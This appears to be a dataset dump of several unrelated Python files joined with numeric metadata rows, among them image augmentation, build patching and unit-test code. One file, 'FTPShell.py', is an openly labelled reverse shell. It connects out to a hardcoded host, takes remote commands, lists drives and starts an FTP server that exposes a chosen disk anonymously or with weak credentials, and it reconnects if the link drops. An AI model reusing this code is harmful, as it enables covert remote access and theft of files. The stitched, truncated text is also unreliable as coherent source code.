if five > 0 and ten > 0: # 一张5一张10
five -= 1
ten -= 1
elif five > 2: # 或者 三张5
five -= 3
else: # 其余情况找不开
return False
elif bill == 10 and five > 0: # 对于10, 只能找零一张5
five -= 1
ten += 1
elif bill == 5: # 5元不用找零
five += 1
else:
return False
return True
| 27.566667
| 59
| 0.41717
| 90
| 827
| 3.833333
| 0.644444
| 0.043478
| 0.046377
| 0.052174
| 0.075362
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108747
| 0.488513
| 827
| 30
| 60
| 27.566667
| 0.706856
| 0.246675
| 0
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9a0e11f9d9a926bf4cc162d77896b7f50869b6
| 4,668
|
py
|
Python
|
utils/augment_data.py
|
caiobarrosv/object-detection-for-grasping
|
2ac2f58700dff73032836ce33d3b98ebf3f29257
|
[
"BSD-3-Clause"
] | null | null | null |
utils/augment_data.py
|
caiobarrosv/object-detection-for-grasping
|
2ac2f58700dff73032836ce33d3b98ebf3f29257
|
[
"BSD-3-Clause"
] | 4
|
2020-07-24T19:31:51.000Z
|
2022-03-12T00:41:28.000Z
|
utils/augment_data.py
|
caiobarrosv/object-detection-for-grasping
|
2ac2f58700dff73032836ce33d3b98ebf3f29257
|
[
"BSD-3-Clause"
] | null | null | null |
from mxnet import nd
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..')))
import utils.common as dataset_commons
import cv2
import numpy as np
import glob
import pandas as pd
from gluoncv.data.transforms.presets.ssd import SSDDefaultTrainTransform
from matplotlib import pyplot as plt
'''
This code only gives you a tool to visualize
the images pointed in the csv file and the related bounding boxes using openCV
'''
data_common = dataset_commons.get_dataset_files()
# classes_keys = [key for key in data_common['classes']]
def apply_transformation(img_width, img_height, image, label):
if not isinstance(image, nd.NDArray):
image = nd.array(image)
if image.shape[0] == 3:
image = tensor_to_image(image)
image = nd.array(image)
label = np.array(label)
transform = SSDDefaultTrainTransform(img_width, img_height)
image, label = transform(image, label)
return image, label
def tensor_to_image(tensor):
image = tensor.asnumpy()*255
image = image.astype(np.uint8)
image = image.transpose((1, 2, 0)) # Move channel to the last dimension
return image
def save_image(image, images_path_save, new_images_name):
if not isinstance(image, np.ndarray):
image = tensor_to_image(image)
cv2.imwrite(images_path_save + '{0:04}'.format(new_images_name) + '.jpg', image)
def print_image(image, bbox, label):
if not isinstance(image, np.ndarray):
image = tensor_to_image(image)
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # OpenCV uses BGR orde
xmin = int(bbox[0][0])
ymin = int(bbox[0][1])
xmax = int(bbox[0][2])
ymax = int(bbox[0][3])
cv2.rectangle(image, (xmin, ymin), (xmax, ymax), (255, 0, 0), 1)
cv2.putText(image, 'label: ' + str(label), (xmin, ymin-10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0))
cv2.imshow('img', image)
a = cv2.waitKey(0)
return a
def load_images_from_csv_and_augment(images_path, csv_path, images_path_save, img_width, img_height):
train_samples = pd.read_csv(csv_path)
csv_list = []
# numeração das novas imagens. As novas imagens terão novos nomes 0000.jpg, etc.
# para isso, será usado o num_new_images abaixo
new_images_name = 0
# number of new images generated from the original image
num_new_images = 4
csv_list = []
for i, row in train_samples.iterrows():
# Reading data from the csv file
image_name_with_extension = row['image']
label = row['label']
xmin = int(row['xmin'])
ymin = int(row['ymin'])
xmax = int(row['xmax'])
ymax = int(row['ymax'])
bbox = [[xmin, ymin, xmax, ymax]]
filename = glob.glob(images_path + "/" + image_name_with_extension)[0]
img = cv2.imread(filename)
for i in range(0, num_new_images+1): # +1 to account for the original image
value = ('{0:04}'.format(new_images_name) + '.jpg',
int(bbox[0][0]),
int(bbox[0][1]),
int(bbox[0][2]),
int(bbox[0][3]),
label
)
csv_list.append(value)
cv2.startWindowThread()
# a = print_image(img, bbox, label)
# if a == 27:
# break
# cv2.destroyWindow('img')
print('Saving image: ', '{0:04}'.format(new_images_name), '.jpg')
save_image(img, images_path_save, new_images_name)
img, bbox = apply_transformation(img_width, img_height, img, bbox)
new_images_name += 1
# if a == 27:
# break
column_name = ['image', 'xmin', 'ymin', 'xmax', 'ymax', 'label']
csv_converter = pd.DataFrame(csv_list, columns=column_name)
return csv_converter
if __name__ == "__main__":
source_images_path = data_common['image_folder']
source_csv_path = data_common['csv_path']
# TODO: Set the file save path
images_path_save = 'images_augmented/' # Folder that will contain the resized images
csv_path_save = 'images_augmented/csv/val_dataset.csv'
img_height = 300
img_width = 300
csv_converter = load_images_from_csv_and_augment(source_images_path, source_csv_path, images_path_save, img_width, img_height)
if not os.path.exists(images_path_save):
try:
os.makedirs(images_path_save + 'csv')
except OSError as e:
if e.errno != errno.EEXIST:
raise
csv_converter.to_csv(csv_path_save, index=None)
print('Successfully converted to a new csv file.')
| 33.826087
| 130
| 0.633248
| 647
| 4,668
| 4.357032
| 0.293663
| 0.042568
| 0.03973
| 0.030153
| 0.202909
| 0.179142
| 0.090458
| 0.063852
| 0.063852
| 0.036893
| 0
| 0.024083
| 0.252785
| 4,668
| 137
| 131
| 34.072993
| 0.784117
| 0.11611
| 0
| 0.096774
| 0
| 0
| 0.058838
| 0.009052
| 0
| 0
| 0
| 0.007299
| 0
| 1
| 0.053763
| false
| 0
| 0.107527
| 0
| 0.204301
| 0.032258
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9c3b49af1837552a765743d83f19677ef7b0fe
| 3,476
|
py
|
Python
|
targets/simple_router/flow_radar_bm/change_bm.py
|
tsihang-zz/FlowRadar-P4
|
1b4f92b83257ba8f34475c098bce8b84daa35b7c
|
[
"Apache-2.0"
] | 15
|
2018-08-21T10:49:38.000Z
|
2021-06-23T14:33:32.000Z
|
targets/simple_router/flow_radar_bm/change_bm.py
|
harvard-cns/FlowRadar-P4
|
1b4f92b83257ba8f34475c098bce8b84daa35b7c
|
[
"Apache-2.0"
] | 1
|
2017-10-16T07:49:06.000Z
|
2017-10-16T13:45:36.000Z
|
targets/simple_router/flow_radar_bm/change_bm.py
|
USC-NSL/FlowRadar-P4
|
1b4f92b83257ba8f34475c098bce8b84daa35b7c
|
[
"Apache-2.0"
] | 6
|
2016-07-26T15:47:46.000Z
|
2018-03-23T01:50:06.000Z
|
import re
import os
def changed(lines, token):
for line in lines:
if line.find(token) != -1:
return True
return False
# copy required files
def copy_files():
os.system("cp flow_radar.h ../build/bm/src")
# change actions.c to add flow_radar lock
def change_actions_c():
actions_c = open("../build/bm/src/actions.c","r")
lines = actions_c.readlines()
actions_c.close()
if changed(lines, '#include "flow_radar.h"'):
return
actions_c = open("../build/bm/src/actions.c","w")
lock_flag = 0
include_flag = 1
for line in lines:
if lock_flag == 1:
m = re.search("^}$", line)
if m != None:
actions_c.write(" unlock_flow_radar();\n")
lock_flag = 0
actions_c.write(line)
if include_flag == 1:
m = re.search("^\*/", line)
if m != None:
actions_c.write('#include "flow_radar.h"\n')
include_flag = 0
if line.find("void action_update_flow_radar") != -1:
actions_c.write(" lock_flow_radar();\n")
lock_flag = 1
actions_c.close()
# change p4_pd_rpc_server.ipp
def change_p4_pd_rpc_server_ipp():
file = open("../build/bm/src/p4_pd_rpc_server.ipp","r")
lines = file.readlines()
file.close()
if changed(lines, '#include "flow_radar.h"'):
return
file = open("../build/bm/src/p4_pd_rpc_server.ipp","w")
key_reg = ["flow_xor_srcip","flow_xor_dstip", "flow_xor_srcport", "flow_xor_dstport", "flow_xor_prot", "flow_count", "packet_count", "flow_filter"]
size = {}
field = ""
for line in lines:
for key in key_reg:
if line.find("void register_read_whole_%s"%key) != -1:
field = key
if field != "":
m = re.search("int8_t ret\[(.*)\];", line)
if m != None:
size[field] = m.group(1)
field = ""
total_size = "(%s)"%size[key_reg[0]]
for key in key_reg[1:]:
total_size += " + (%s)"%size[key]
file.write('extern "C" {\n')
file.write('#include "flow_radar.h"\n')
file.write('}\n')
for line in lines:
file.write(line)
if line.find("// REGISTERS") != -1:
file.write(" void dump_flow_radar(std::vector<int8_t> & _return, const SessionHandle_t sess_hdl, const DevTarget_t& dev_tgt) {\n")
file.write(" p4_pd_dev_target_t pd_dev_tgt;\n")
file.write(" pd_dev_tgt.device_id = dev_tgt.dev_id;\n")
file.write(" pd_dev_tgt.dev_pipe_id = dev_tgt.dev_pipe_id;\n")
file.write(" int8_t ret[%s];\n"%total_size)
file.write(" lock_flow_radar();\n")
ret = "ret"
for key in key_reg:
file.write(" p4_pd_simple_router_register_read_whole_%s(sess_hdl, pd_dev_tgt, %s);\n"%(key, ret))
file.write(" p4_pd_simple_router_register_clean_%s(sess_hdl, pd_dev_tgt);\n"%(key))
ret += " + (%s)"%size[key]
file.write(" unlock_flow_radar();\n")
file.write(" _return.resize(%s);\n"%total_size)
file.write(" for (int i = 0; i < _return.size(); i++)\n")
file.write(" _return[i] = ret[i];\n")
file.write(" }\n")
file.close()
def change_p4_pd_rpc_thrift():
file = open("../build/bm/thrift/p4_pd_rpc.thrift","r")
lines = file.readlines()
file.close()
if changed(lines, "list<byte> dump_flow_radar"):
return
file = open("../build/bm/thrift/p4_pd_rpc.thrift","w")
for line in lines:
file.write(line)
if line.find("# registers") != -1:
file.write(" list<byte> dump_flow_radar(1:res.SessionHandle_t sess_hdl,\n")
file.write(" 2:res.DevTarget_t dev_tgt);\n")
file.close()
if __name__ == "__main__":
copy_files()
change_actions_c()
change_p4_pd_rpc_server_ipp()
change_p4_pd_rpc_thrift()
| 31.035714
| 148
| 0.649597
| 570
| 3,476
| 3.678947
| 0.187719
| 0.085837
| 0.047687
| 0.033381
| 0.571292
| 0.408202
| 0.285646
| 0.254173
| 0.22556
| 0.122079
| 0
| 0.011431
| 0.169448
| 3,476
| 111
| 149
| 31.315315
| 0.714929
| 0.025029
| 0
| 0.298969
| 0
| 0.010309
| 0.396455
| 0.153028
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051546
| false
| 0
| 0.020619
| 0
| 0.123711
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9c577bd20e78c6c12bbdda22baa4f5a81a595e
| 618
|
py
|
Python
|
Python/Armstrong_Number.py
|
shashwat-agarwal/hacktoberfest-2
|
552a4278ffd671603f8659562427b0f1ac5127a4
|
[
"Apache-2.0"
] | 17
|
2020-10-02T03:28:33.000Z
|
2020-10-24T04:08:30.000Z
|
Python/Armstrong_Number.py
|
shubhamgoel90/hacktoberfest
|
e7b1aa18485c4a080b2568910f82e98a5feb6f37
|
[
"Apache-2.0"
] | 22
|
2020-10-01T20:00:56.000Z
|
2020-10-31T01:56:10.000Z
|
Python/Armstrong_Number.py
|
shubhamgoel90/hacktoberfest
|
e7b1aa18485c4a080b2568910f82e98a5feb6f37
|
[
"Apache-2.0"
] | 139
|
2020-10-01T19:51:40.000Z
|
2020-11-02T19:58:19.000Z
|
#Program to check whether the number is an armstrong number or not
#Ask user to enter the number
number=int(input("Enter the number you want to check armstrong: "))
#To calculate the length of number entered.
order=len(str(number))
#Initialise sum to 0
sum=0
temp=number
while temp>0:
num=temp%10
sum+=num**order
temp//=10
if (number==sum):
print("The number you have entered is an Armstrong number.")
else:
print("The number you have entered is not an Armstrong number.")
#OUTPUT:
#Enter the number you want to check armstrong: 1634
#The number you have entered is an Armstrong number.
| 21.310345
| 68
| 0.723301
| 103
| 618
| 4.339806
| 0.368932
| 0.14094
| 0.134228
| 0.127517
| 0.431767
| 0.431767
| 0.431767
| 0.353468
| 0.187919
| 0
| 0
| 0.022
| 0.190939
| 618
| 28
| 69
| 22.071429
| 0.872
| 0.425566
| 0
| 0
| 0
| 0
| 0.439655
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9df6e37fc71858adef3ee969afe3699916d4a6
| 2,669
|
py
|
Python
|
plugins/DonorlessOperation/__init__.py
|
j-h-m/Media-Journaling-Tool
|
4ab6961e2768dc002c9bbad182f83188631f01bd
|
[
"BSD-3-Clause"
] | null | null | null |
plugins/DonorlessOperation/__init__.py
|
j-h-m/Media-Journaling-Tool
|
4ab6961e2768dc002c9bbad182f83188631f01bd
|
[
"BSD-3-Clause"
] | null | null | null |
plugins/DonorlessOperation/__init__.py
|
j-h-m/Media-Journaling-Tool
|
4ab6961e2768dc002c9bbad182f83188631f01bd
|
[
"BSD-3-Clause"
] | null | null | null |
import logging
from maskgen import video_tools
import random
import maskgen.video_tools
import os
import maskgen
import json
plugin = "DonorPicker"
def transform(img, source, target, **kwargs):
valid = []
possible = []
data = {}
logging.getLogger('maskgen').info(str(kwargs))
for f in os.listdir(kwargs['Directory']):
if os.path.splitext(f)[1] == '.json':
data = json.load(open(os.path.join(kwargs['Directory'],f)))
elif video_tools.get_shape_of_video(os.path.join(kwargs['Directory'], f)) == video_tools.get_shape_of_video(source):
possible.append(os.path.join(kwargs['Directory'],f))
for d in possible:
if os.path.split(d)[1] in data:
valid.append(d)
if len(valid) == 0:
raise ValueError('No donors of correct size available')
donor = valid[0]
if kwargs['Pick Preference'] == 'Random':
donor = valid[random.randint(0,len(valid)-1)]
elif kwargs['Pick Preference'] == 'By Name':
for v in valid:
if os.path.splitext(source)[0] in (os.path.split(v)[1]):
donor = v
elif kwargs['Pick Preference'] =='Specific':
donor = kwargs['Donator']
data = data[os.path.split(donor)[1]]
data['Donator'] = donor
logging.getLogger('maskgen').info("Donor Selected: {}".format(donor))
#shutil.copy((os.path.join(kwargs['Directory'],f)),os.path.join(scenario_model.get, f))
#result, err = callPlugin(kwargs['Plugin'],img,source,target,**kwargs)
#final = {k: v for d in [result, data] for k, v in d.items()} if result is not None else data
logging.getLogger('maskgen').info(str(data))
#os.remove(os.path.join(".", f))
return data,None
def operation():
return {'name': 'SelectRegion',
'category': 'Select',
'type': 'Selector',
'description': 'Pick a donor and other data from a directory',
'software': 'Maskgen',
'version': maskgen.__version__,
'arguments': {
'Directory': {
'type': 'file',
'defaultvalue': '.',
'description': 'Directory full of possible PRNU choices'
},
'Pick Preference': {
'type': 'list',
'values': ['Random', 'By Name', 'Specific'],
'defaultvalue': 'Random',
'description': 'Select the deciding factor for which video will be selected from the directory'
}
},
'transitions': [
'video.video'
'image.image'
]
}
| 38.128571
| 124
| 0.557887
| 307
| 2,669
| 4.801303
| 0.345277
| 0.044776
| 0.040706
| 0.043419
| 0.150611
| 0.150611
| 0
| 0
| 0
| 0
| 0
| 0.004772
| 0.293368
| 2,669
| 70
| 125
| 38.128571
| 0.776776
| 0.104159
| 0
| 0
| 0
| 0
| 0.252931
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.112903
| 0.016129
| 0.177419
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9e0f831db1b36f8edc783c6c1bfaa61c116474
| 1,228
|
py
|
Python
|
track_model/eval_avg_scores.py
|
QUVA-Lab/lang-tracker
|
6cb3630471765565b6f2d34a160f0cd51d95a082
|
[
"BSD-2-Clause-FreeBSD"
] | 31
|
2017-09-13T13:40:59.000Z
|
2022-01-25T16:55:19.000Z
|
track_model/eval_avg_scores.py
|
zhenyangli/lang-tracker
|
dddd808a22582573ab0a5e4c3dbf0ba054e42d61
|
[
"BSD-3-Clause"
] | 4
|
2017-09-14T01:56:58.000Z
|
2021-01-28T00:58:58.000Z
|
track_model/eval_avg_scores.py
|
QUVA-Lab/lang-tracker
|
6cb3630471765565b6f2d34a160f0cd51d95a082
|
[
"BSD-2-Clause-FreeBSD"
] | 9
|
2017-09-28T03:22:08.000Z
|
2021-01-19T10:56:44.000Z
|
import caffe
import numpy as np
import os
import sys
import track_model_train as track_model
import train_config
max_iter = 1000
def eval_avg_scores(config):
with open('./track_model/scores.prototxt', 'w') as f:
f.write(str(track_model.generate_scores('', config)))
caffe.set_device(config.gpu_id)
caffe.set_mode_gpu()
# Load pretrained model
scores_net = caffe.Net('./track_model/scores.prototxt',
config.weights,
caffe.TEST)
#import ipdb; ipdb.set_trace()
scores = 0
num_sample = 0
for it in range(max_iter):
scores_net.forward()
scores_val = scores_net.blobs['fcn_scores'].data[...].copy()
scores += scores_val.sum()
num_sample += scores_val.size
# ALOV conv345 -> 0.01196
# OTB50 scores = 72313495.437500, samples = 1936000, avg_score = 37.364085 -> 0.02676
# ILSVRC scores = 66083375.812500, samples = 1936000, avg_score = 34.133975 -> 0.02929
avg_score = scores / num_sample
print('\tscores = %f, samples = %d, avg_score = %f\t'
% (scores, num_sample, avg_score))
if __name__ == '__main__':
config = train_config.Config()
eval_avg_scores(config)
| 29.95122
| 90
| 0.643322
| 165
| 1,228
| 4.521212
| 0.472727
| 0.067024
| 0.034853
| 0.050938
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093248
| 0.240228
| 1,228
| 40
| 91
| 30.7
| 0.706324
| 0.198697
| 0
| 0
| 0
| 0
| 0.124744
| 0.059305
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.214286
| 0
| 0.25
| 0.035714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5f9e1b47610239b65145f24fa61ab7d89533b94e
| 1,968
|
py
|
Python
|
tests/group_test.py
|
gekkeharry13/api-python
|
b18d1694c19f5f972a126ee9ff3d3971a08815cb
|
[
"Apache-2.0"
] | 1
|
2018-05-31T17:29:30.000Z
|
2018-05-31T17:29:30.000Z
|
tests/group_test.py
|
gekkeharry13/api-python
|
b18d1694c19f5f972a126ee9ff3d3971a08815cb
|
[
"Apache-2.0"
] | 8
|
2015-02-20T16:22:12.000Z
|
2019-04-25T23:57:43.000Z
|
tests/group_test.py
|
gekkeharry13/api-python
|
b18d1694c19f5f972a126ee9ff3d3971a08815cb
|
[
"Apache-2.0"
] | 8
|
2015-02-28T06:56:15.000Z
|
2020-01-02T22:42:09.000Z
|
#
# Copyright (C) 2014 Conjur Inc
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from mock import patch
import conjur
api = conjur.new_from_key('foo', 'bar')
group = api.group('v1/admins')
def test_group():
assert group.role.kind == 'group'
assert group.role.identifier == 'v1/admins'
assert group.role.roleid == api.config.account + ':group:v1/admins'
@patch.object(group.role, 'grant_to')
def test_add_member(mock_grant_to):
member = api.user('foo')
group.add_member(member)
mock_grant_to.assert_called_with(member, False)
@patch.object(group.role, 'grant_to')
def test_add_member_admin(mock_grant_to):
member = api.role('something', 'else')
group.add_member(member, True)
mock_grant_to.assert_called_with(member, True)
@patch.object(group.role, 'revoke_from')
def test_remove_member(mock_revoke_from):
member = api.user('foo')
group.remove_member(member)
mock_revoke_from.assert_called_with(member)
| 37.132075
| 82
| 0.757622
| 299
| 1,968
| 4.87291
| 0.424749
| 0.060398
| 0.030199
| 0.041181
| 0.154427
| 0.104324
| 0.104324
| 0.059025
| 0.059025
| 0.059025
| 0
| 0.004207
| 0.154472
| 1,968
| 52
| 83
| 37.846154
| 0.871394
| 0.533537
| 0
| 0.173913
| 0
| 0
| 0.101336
| 0
| 0
| 0
| 0
| 0
| 0.26087
| 1
| 0.173913
| false
| 0
| 0.086957
| 0
| 0.26087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fa0436f9f5d626cf4b365a484376d1f5343ee15
| 5,046
|
py
|
Python
|
FTPShell/FTPShell.py
|
dsogo/H4CKING
|
58aaaabc25995dbff9aa4985e8308a963772b87e
|
[
"MIT"
] | 17
|
2020-10-07T01:37:32.000Z
|
2021-12-11T21:23:25.000Z
|
FTPShell/FTPShell.py
|
Al0nnso/H4CKING
|
58aaaabc25995dbff9aa4985e8308a963772b87e
|
[
"MIT"
] | null | null | null |
FTPShell/FTPShell.py
|
Al0nnso/H4CKING
|
58aaaabc25995dbff9aa4985e8308a963772b87e
|
[
"MIT"
] | 8
|
2020-09-22T03:14:51.000Z
|
2022-03-07T16:03:24.000Z
|
from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from multiprocessing import Process
from pyftpdlib import servers
from time import sleep
from requests import get
import socket
import psutil
import win32api
# Al0nnso - 2019
# FTP Reverse Shell
# NOT TESTED WITH EXTERN NETWORK
try:
ip = get('https://api.ipify.org').text
except:
ip='ERROR'
pass
ftp=None
server = None
disk = "\\"
address = ("0.0.0.0", 21)
user = None
host = '192.168.15.5'# YOUR IP OR HOST
port = 443
def ftp_main(server, address, disk, user, s, ip):
print('FTP STARTING...')
try:
authorizer = DummyAuthorizer()
try:
try:
s.send('FTP starting...: {}'.format(ip).encode())
except:
pass
print('TRYING...')
if disk.isalpha():
disk = '{}:\\'.format(disk)
if user == None:
authorizer.add_anonymous(disk)
elif user == '/user':
authorizer.add_user('user', '404', disk, perm="elradfmwMT")
else:
authorizer.add_user(user, user, disk, perm="elradfmwMT")
except:
authorizer.add_anonymous("\\")
handler = FTPHandler
handler.authorizer = authorizer
address = ("0.0.0.0", 21)
server = servers.FTPServer(address, FTPHandler)
try:
s.send('[+] FTP server started on ftp://{}:21'.format(ip).encode())
except:
pass
server.serve_forever()
except Exception as e:
sleep(10)
print('reconecting...')
try:
s.send('reconecting...'.encode())
except:
pass
print(e)
ftp_main()
def socketConn(ftp):
try:
global address, disk, user, host, port, server, ip
# server=None
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('[+] Connected'.encode())
while True:
Fdata = s.recv(3000)
Fdata = Fdata.decode()
if len(Fdata) > 0 or Fdata == " ":
print(Fdata)
data = str(Fdata).split(" ")
if 'exit' in data[0].lower():
try:
ftp.terminate()
s.send('ftp closed'.encode())
except:
s.send('WTF exit?'.encode())
elif data[0].lower()=='ip' or data[0].lower()=='inf':
s.send(str(ip).encode())
elif data[0].lower()=='disk' or data[0].lower()=='d':#LIST DISK
try:
disks=None
disks=psutil.disk_partitions()
s.send(str(disks).replace(',','\n').encode())
except:
s.send('FAIL DISK'.encode())
elif data[0].lower()=='vol' or data[0].lower()=='v':#LIST VOL OF DISK
try:
drives = win32api.GetLogicalDriveStrings()
drives = drives.split('\000')[:-1]
s.send((str(drives).replace("\'","")).encode())
except Exception as e:
s.send('FAIL VOL: {}'.format(e).encode())
elif (data[0].lower() == 'start'):
mode = data[0].lower()
print(len(data))
for i in range(len(data)):
print(str(i))
if mode == 'start' and '-D' in data[i].upper():
if data[i + 1].isalpha():
disk = data[i + 1].upper()
s.send('DISK: {}'.format(disk).encode())
if mode == 'start' and '-U' in data[i].upper():
user = data[i + 1]
s.send('USER: {}'.format(user).encode())
if mode == 'start' and '-A' in data[i].upper():
addr = data[i + 1]
print('addr: {}'.format(addr))
try:
address = (addr, 21)
s.send('address: {}'.format(address).encode())
except:
s.send('fail to set addr...'.encode())
s.send(' '.encode())
if ftp!=None:
ftp.terminate()
s.send('ftp closed'.encode())
ftp = Process(target=ftp_main,args=(server, address, disk, user, s, ip))
ftp.start()
else:
s.send(' '.encode())
else:
s.send(' '.encode())
except Exception as e:
print('Socket reconection...')
print(e)
s = None
sleep(2)
socketConn(ftp)
if __name__ == '__main__':
socketConn(ftp)
| 35.535211
| 92
| 0.441538
| 509
| 5,046
| 4.339882
| 0.273084
| 0.043006
| 0.040742
| 0.027162
| 0.179267
| 0.062472
| 0.028972
| 0
| 0
| 0
| 0
| 0.022177
| 0.419144
| 5,046
| 141
| 93
| 35.787234
| 0.731491
| 0.022989
| 0
| 0.320611
| 0
| 0
| 0.082284
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015267
| false
| 0.030534
| 0.068702
| 0
| 0.083969
| 0.076336
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
5fa103b113b3be7f53cb7ec2e64ba88c2cf38693
| 8,321
|
py
|
Python
|
tests/test_io.py
|
wellcometrust/deep_reference_parser
|
b58e4616f4de9bfe18ab41e90f696f80ab876245
|
[
"MIT"
] | 13
|
2020-02-19T02:09:00.000Z
|
2021-12-16T23:15:58.000Z
|
tests/test_io.py
|
wellcometrust/deep_reference_parser
|
b58e4616f4de9bfe18ab41e90f696f80ab876245
|
[
"MIT"
] | 33
|
2020-02-12T11:21:51.000Z
|
2022-02-10T00:48:17.000Z
|
tests/test_io.py
|
wellcometrust/deep_reference_parser
|
b58e4616f4de9bfe18ab41e90f696f80ab876245
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# coding: utf-8
import os
import pytest
from deep_reference_parser.io.io import (
read_jsonl,
write_jsonl,
load_tsv,
write_tsv,
_split_list_by_linebreaks,
_unpack,
)
from deep_reference_parser.reference_utils import yield_token_label_pairs
from .common import TEST_JSONL, TEST_TSV_TRAIN, TEST_TSV_PREDICT, TEST_LOAD_TSV
@pytest.fixture(scope="module")
def tmpdir(tmpdir_factory):
return tmpdir_factory.mktemp("data")
def test_unpack():
before = [
(
("token0", "token1", "token2", "token3"),
("label0", "label1", "label2", "label3")
),
(
("token0", "token1", "token2"),
("label0", "label1", "label2")
),
]
expected = [
(
("token0", "token1", "token2", "token3"),
("token0", "token1", "token2"),
),
(
("label0", "label1", "label2", "label3"),
("label0", "label1", "label2")
),
]
actual = _unpack(before)
assert expected == actual
def test_write_tsv(tmpdir):
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
)
token_label_tuples = list(yield_token_label_pairs(expected[0], expected[1]))
PATH = os.path.join(tmpdir, "test_tsv.tsv")
write_tsv(token_label_tuples, PATH)
actual = load_tsv(os.path.join(PATH))
assert expected == actual
def test_load_tsv_train():
"""
Text of TEST_TSV_TRAIN:
```
the i-r
focus i-r
in i-r
Daloa i-r
, i-r
Côte i-r
d’Ivoire]. i-r
Bulletin i-r
de i-r
la i-r
Société i-r
de i-r
Pathologie i-r
Exotique i-r
et i-r
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
)
actual = load_tsv(TEST_TSV_TRAIN)
assert len(actual[0][0]) == len(expected[0][0])
assert len(actual[0][1]) == len(expected[0][1])
